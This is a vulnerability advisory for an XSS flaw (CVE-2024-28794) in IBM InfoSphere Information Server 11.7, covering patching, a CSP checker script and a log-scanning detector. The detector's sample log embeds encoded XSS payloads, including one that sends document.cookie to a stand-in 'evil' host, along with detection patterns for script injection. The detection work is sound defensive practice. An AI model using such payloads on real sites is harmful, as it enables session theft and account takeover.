CVE-2024-28794

5.4 MEDIUM (CVSS 3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N: authenticated attacker, victim interaction required, scope changed because the script runs in the victim's browser)

📋 TL;DR

IBM InfoSphere Information Server 11.7 contains a cross-site scripting (XSS) vulnerability that lets an authenticated user embed arbitrary JavaScript in the web UI. When another user views the injected content, the script runs in that user's browser inside a trusted session, where it can read session tokens or credentials and perform actions as that user. The medium score reflects two preconditions: the attacker needs a valid account, and a victim must view the content. The impact rises sharply when the victim is an administrator. Any organization running an unpatched 11.7 deployment is affected.

💻 Affected Systems

Products:
  • IBM InfoSphere Information Server
Versions: 11.7
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user access to exploit. All deployments of version 11.7 are affected unless patched.

📦 What is this software?

IBM InfoSphere Information Server is IBM's data integration and governance suite (DataStage, QualityStage, Information Governance Catalog and related components). Much of its administration and metadata management is done through browser-based consoles, which is the surface this XSS targets, and the platform holds connection credentials for the source and target systems it integrates, which is what makes a hijacked administrator session valuable.

⚠️ Risk & Real-World Impact

🔴

Worst Case

If an administrator views the injected content, the attacker's script runs with the administrator's session: it can create or elevate accounts, alter integration jobs, and read the metadata and stored connection credentials the platform holds, giving a foothold for pivoting to the source and target systems InfoSphere connects to.

🟠

Likely Case

An attacker with a low-privilege account plants script that captures other users' session cookies or credentials, giving unauthorized access to the InfoSphere platform and exposing the data and metadata those users can see.

🟢

If Mitigated

With the fix pack applied the injection path is closed. Compensating controls (a strict Content Security Policy, WAF filtering, fewer accounts able to author content in the console, short session lifetimes) reduce exploitability but leave the flaw in the product, so treat them as a stopgap until the patch is applied.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

XSS is a commonly exploited class. Here the attacker needs a valid account on the web interface, and a victim must view the injected content before anything happens; there is no network-level exploit without both.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply fix pack 11.7.1.4 or later

Vendor Advisory: https://www.ibm.com/support/pages/node/7158444

Restart Required: Yes

Instructions:

1. Download the fix pack named in the IBM advisory from IBM Fix Central (confirm the exact fix pack and any additional security patch the advisory lists for your version).
2. Apply it following IBM's installation instructions on every tier that hosts the web console (the services tier at minimum).
3. Restart the InfoSphere Information Server services and confirm the console reports the updated version.

🔧 Temporary Workarounds

Input Validation Filter (platform: all)

Put WAF or reverse-proxy rules in front of the web console that block requests carrying script fragments (<script, javascript:, on*= event handlers). Normalize URL and HTML-entity encoding before matching; a rule that inspects only the raw request misses %3Cscript%3E and similar variants.

Content Security Policy (platform: all)

Add a strict Content-Security-Policy header at the reverse proxy so injected inline script cannot execute (script-src limited to 'self' plus nonces or hashes, no 'unsafe-inline', no scheme-wide sources such as https:). Roll it out in Content-Security-Policy-Report-Only mode first: the console may rely on inline scripts that a strict policy would break, and a proxy cannot add nonces to vendor-generated HTML.
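A check for the Content Security Policy workaround above, added here as an example (not IBM's code or configuration): it parses a Content-Security-Policy header the way a browser resolves script-src, including the fallback to default-src and the rule that a nonce or hash makes 'unsafe-inline' inert, and reports each source expression that would still let injected script run. The two headers are constructed samples and the nonce value is illustrative.

```python
"""Assess whether a Content-Security-Policy header constrains injected script.

Added example for the CSP workaround; not IBM code. WEAK_CSP and STRICT_CSP
are constructed sample headers; the nonce value is illustrative.
"""
import re

# Source expressions that let attacker-chosen script load from anywhere.
BROAD_SOURCES = {"*", "http:", "https:", "data:", "blob:"}

# 'nonce-...' or 'sha256-...' style sources; when present in a directive,
# browsers ignore 'unsafe-inline' in that directive (CSP Level 2 and later).
NONCE_OR_HASH = re.compile(r"^'(nonce-|sha(256|384|512)-)[A-Za-z0-9+/=_-]+'$")

WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:; object-src 'none'"
STRICT_CSP = ("default-src 'self'; script-src 'self' 'nonce-r4nd0m'; "
              "object-src 'none'; base-uri 'self'; frame-ancestors 'none'")


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}.
    Directive names are case-insensitive; browsers ignore a repeated
    directive, so only the first occurrence is kept."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective_script_sources(policy):
    """script-src governs scripts; when absent, browsers fall back to default-src."""
    if "script-src" in policy:
        return policy["script-src"]
    return policy.get("default-src")


def script_policy_findings(header):
    """Return human-readable weaknesses in the script policy.
    An empty list means inline and remote script injection is constrained."""
    sources = effective_script_sources(parse_csp(header))
    if sources is None:
        return ["no script-src or default-src: script execution is unrestricted"]
    findings = []
    lowered = [s.lower() for s in sources]
    has_nonce_or_hash = any(NONCE_OR_HASH.match(s) for s in sources)
    if "'unsafe-inline'" in lowered and not has_nonce_or_hash:
        findings.append("'unsafe-inline' lets injected <script> blocks and on*= handlers run")
    if "'unsafe-eval'" in lowered:
        findings.append("'unsafe-eval' lets injected strings reach eval()/Function()")
    for src in lowered:
        if src in BROAD_SOURCES:
            findings.append(f"source '{src}' allows scripts from any origin of that kind")
    return findings


if __name__ == "__main__":
    for label, header in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(label, script_policy_findings(header) or ["ok"])
```

Run it against the header your reverse proxy actually emits (copy it from a browser's developer tools); a policy that passes here still needs the report-only trial described above, because the check says nothing about whether the console's own scripts keep working.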

🧯 If You Can't Patch

  • Segment the network so the web console is reachable only from administrative networks, and never expose it directly to the internet
  • Reduce and review the set of accounts that can log in to the web console; every account is a potential injection source
  • Keep session lifetimes short so that a stolen cookie has a narrow window of use

🔍 How to Verify

Check if Vulnerable:

Running IBM InfoSphere Information Server 11.7 without the fix pack (11.7.1.4 or later per this page; confirm the exact level against the advisory)

Check Version:

Read the version from the Information Server administration console, or open Version.xml in the installation directory on the services tier, which lists the installed components and fix packs

Verify Fix Applied:

Confirm that fix pack 11.7.1.4 or later appears in the installed-component list and that the console reports the updated version after the services restart

📡 Detection & Monitoring

Log Indicators:

  • Script fragments (<script, javascript:, on*= event handlers) in request parameters or form bodies sent to the web console, including percent- or entity-encoded forms
  • Repeated requests of that kind from one account, or one account submitting them across many console pages

Network Indicators:

  • HTTP requests to the InfoSphere web console whose parameters contain script tags or JavaScript URIs
  • Browsers of console users connecting to unexpected external hosts shortly after loading console pages (cookie or credential exfiltration)

SIEM Query:

web_requests WHERE (url CONTAINS '/ibm/iis/' AND (decode(payload) CONTAINS '<script' OR decode(payload) CONTAINS 'javascript:' OR decode(payload) MATCHES 'on[a-z]+='))

Match on the console's real path prefix (on a default install the web console is served under /ibm/iis/; verify against your deployment) rather than the product name, and apply your SIEM's URL-decode function (written as decode() above) before comparing: a literal '<script>' match never sees %3Cscript%3E.
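The query above carried through as an added example (not an IBM or SIEM-vendor tool) over constructed access-log lines: it decodes percent- and entity-encoded request targets before matching, counts flagged requests per account, and contrasts the result with the literal '<script>' comparison, which finds nothing in the same lines. The /ibm/iis/ prefix, user names, IPs and timestamps are assumptions.

```python
"""Scan web-console access logs for script-injection attempts, decoding the
URL and HTML-entity encodings that a raw 'CONTAINS <script>' match misses.

Added example, not an IBM or SIEM-vendor tool. SAMPLE_LOG is constructed
(Combined-Log-like lines); user names and IPs are fictional, and the
/ibm/iis/ path prefix is assumed to be where the console is served.
"""
import html
import re
from collections import Counter
from urllib.parse import unquote

CONSOLE_PREFIX = "/ibm/iis/"   # assumed console path; check your deployment

SAMPLE_LOG = """\
10.0.0.5 - analyst1 [12/Jun/2024:10:01:02 +0000] "GET /ibm/iis/console/ HTTP/1.1" 200 5120
10.0.0.7 - etl_dev [12/Jun/2024:10:01:10 +0000] "POST /ibm/iis/console/project?name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 811
10.0.0.9 - etl_dev [12/Jun/2024:10:02:44 +0000] "GET /ibm/iis/igc/search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2044
10.0.0.7 - etl_dev [12/Jun/2024:10:03:01 +0000] "GET /ibm/iis/console/help?topic=javascript%3Aalert(document.domain) HTTP/1.1" 200 640
10.0.0.5 - analyst1 [12/Jun/2024:10:04:20 +0000] "GET /ibm/iis/console/report?desc=%26lt%3Bscript%26gt%3B HTTP/1.1" 200 700
10.0.0.12 - auditor [12/Jun/2024:10:05:00 +0000] "GET /ibm/iis/console/job?name=daily_load HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Patterns applied to the decoded, lower-cased request target.
PATTERNS = {
    "script-tag": re.compile(r"<\s*script"),
    "javascript-uri": re.compile(r"javascript\s*:"),
    "event-handler": re.compile(r"\bon[a-z]+\s*="),
    "html-injection": re.compile(r"<\s*(img|svg|iframe|object|embed)\b"),
}


def naive_match(line):
    """The literal comparison from the SIEM query: sees none of the encoded forms."""
    return "<script>" in line or "javascript:" in line


def normalize(value, rounds=3):
    """Percent-decode until stable (catches double encoding), then resolve
    HTML entities and lower-case so patterns match regardless of case."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return html.unescape(value).lower()


def scan(log_text, prefix=CONSOLE_PREFIX):
    """Return one record per console request whose decoded target matches
    an injection pattern; records list every pattern that matched."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["target"].startswith(prefix):
            continue
        decoded = normalize(m["target"])
        matched = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
        if matched:
            hits.append({"ip": m["ip"], "user": m["user"], "ts": m["ts"],
                         "target": m["target"], "patterns": matched})
    return hits


def by_user(hits):
    """Count flagged requests per account: repeat offenders are the
    'multiple attempts' indicator, and the account is the injection source."""
    return Counter(h["user"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print("naive query hits:", sum(naive_match(l) for l in SAMPLE_LOG.splitlines()))
    for h in found:
        print(h["user"], h["ip"], h["patterns"], h["target"][:60])
    print(dict(by_user(found)))
```

The decoding step is what separates this from the one-line query: the second sample line is plain percent-encoded, the third is double-encoded, the fourth encodes only the colon, and the fifth arrives as HTML entities, and the literal comparison matches none of them. Expect false positives on legitimate parameters that happen to contain these substrings; the per-account count is the signal to triage first.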

🔗 References

  • IBM Security Bulletin: https://www.ibm.com/support/pages/node/7158444
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-28794